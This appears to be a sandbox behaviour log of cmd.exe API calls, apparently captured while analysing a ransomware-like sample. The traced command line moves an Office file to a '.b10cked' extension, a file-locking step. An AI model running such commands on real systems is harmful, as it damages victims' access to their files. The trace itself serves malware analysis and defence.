FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.838] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cedb8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.838] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1ced9c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ced9c*=0x2c) returned 1 [0201.841] longjmp () [0201.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.842] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.843] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.843] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.844] SetConsoleInputExeNameW () returned 0x1 [0201.844] GetConsoleOutputCP () returned 0x1b5 [0201.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.844] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.845] exit (_Code=1) Process: id = "475" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ae0" os_pid = "0xf58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29336 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29337 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29338 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29339 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = 
"private_0x00000000000f0000" filename = "" Region: id = 29340 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29341 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29342 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29343 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29344 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29345 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29564 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29565 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29566 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29567 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 29568 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" 
filename = "" Region: id = 29569 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29570 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29571 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29572 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29573 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29574 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29576 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29577 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" 
Region: id = 29626 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 29627 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29628 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29629 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29630 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29631 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29632 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 29633 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 29634 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 29635 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 29682 start_va = 0x1290000 end_va = 0x134ffff entry_point = 0x1290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 672 os_tid = 0xfec [0201.678] 
GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb2c | out: lpSystemTimeAsFileTime=0x1efb2c*(dwLowDateTime=0xad0510a0, dwHighDateTime=0x1d440a9)) [0201.678] GetCurrentProcessId () returned 0xf58 [0201.678] GetCurrentThreadId () returned 0xfec [0201.678] GetTickCount () returned 0x38f24 [0201.678] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb24 | out: lpPerformanceCount=0x1efb24*=25846770403) returned 1 [0201.679] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.679] __set_app_type (_Type=0x1) [0201.679] __p__fmode () returned 0x76b331f4 [0201.679] __p__commode () returned 0x76b331fc [0201.680] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.680] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.680] GetCurrentThreadId () returned 0xfec [0201.680] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfec) returned 0x38 [0201.680] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.680] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efabc | out: phkResult=0x1efabc*=0x0) returned 0x2 [0201.714] VirtualQuery (in: lpAddress=0x1efaf3, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa8c, dwLength=0x1c | out: 
lpBuffer=0x1efa8c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa8c, dwLength=0x1c | out: lpBuffer=0x1efa8c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.714] GetConsoleOutputCP () returned 0x1b5 [0201.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.717] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.725] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.737] GetEnvironmentStringsW () returned 0x320198* [0201.738] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0201.738] GetEnvironmentStringsW () 
returned 0x320198* [0201.738] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0201.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea2c | out: phkResult=0x1eea2c*=0x40) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0xc0, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x1, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x1, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x0, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x40, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x40, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x40, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.738] RegCloseKey (hKey=0x40) 
returned 0x0 [0201.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea2c | out: phkResult=0x1eea2c*=0x40) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x40, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x1, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.738] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x1, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.739] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x0, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.739] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x9, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.739] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x4, lpData=0x1eea38*=0x9, lpcbData=0x1eea30*=0x4) returned 0x0 [0201.739] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea34, lpData=0x1eea38, lpcbData=0x1eea30*=0x1000 | out: lpType=0x1eea34*=0x0, lpData=0x1eea38*=0x9, lpcbData=0x1eea30*=0x1000) returned 0x2 [0201.739] RegCloseKey (hKey=0x40) returned 0x0 [0201.739] time (in: timer=0x0 | out: timer=0x0) returned 
0x5b8863a3 [0201.739] srand (_Seed=0x5b8863a3) [0201.739] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"" [0201.739] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"" [0201.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.739] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.740] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.740] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.740] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.740] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.740] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.740] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.740] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.740] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.740] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.740] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.740] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 
[0201.740] GetEnvironmentStringsW () returned 0x3222e8* [0201.740] FreeEnvironmentStringsW (penv=0x3222e8) returned 1 [0201.740] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.740] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.740] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.740] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.740] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.740] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.740] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.740] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.740] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.740] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.741] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef7f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.741] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef7f8, lpFilePart=0x1ef7f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef7f4*="Desktop") returned 0x18 [0201.741] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.741] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef574 | out: lpFindFileData=0x1ef574) returned 0x320028 [0201.741] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0201.741] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef574 | out: lpFindFileData=0x1ef574) returned 0x320028 [0201.741] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0201.741] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef574 | out: 
lpFindFileData=0x1ef574) returned 0x320028 [0201.741] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0201.742] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.742] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.742] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.742] GetEnvironmentStringsW () returned 0x322b08* [0201.742] FreeEnvironmentStringsW (penv=0x322b08) returned 1 [0201.742] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.742] GetConsoleOutputCP () returned 0x1b5 [0201.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.756] GetUserDefaultLCID () returned 0x409 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef938, cchData=128 | out: lpLCData="0") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef938, cchData=128 | out: lpLCData="0") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef938, cchData=128 | out: lpLCData="1") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, 
cchData=32 | out: lpLCData="Thu") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.761] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.761] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.762] GetConsoleTitleW (in: lpConsoleTitle=0x3108f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.774] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.774] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.774] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.774] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.775] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.775] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.775] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.775] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.775] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.775] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.775] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.778] GetConsoleTitleW (in: lpConsoleTitle=0x1ef630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.806] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.806] _wcsicmp (_String1="move", _String2="ERASE") returned 8 
[0201.806] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.806] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.806] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.806] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.806] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.806] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.806] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.806] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.806] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.806] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.806] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.806] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.806] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.806] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.806] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.806] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.806] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.806] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.806] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.806] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.806] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.806] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.806] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 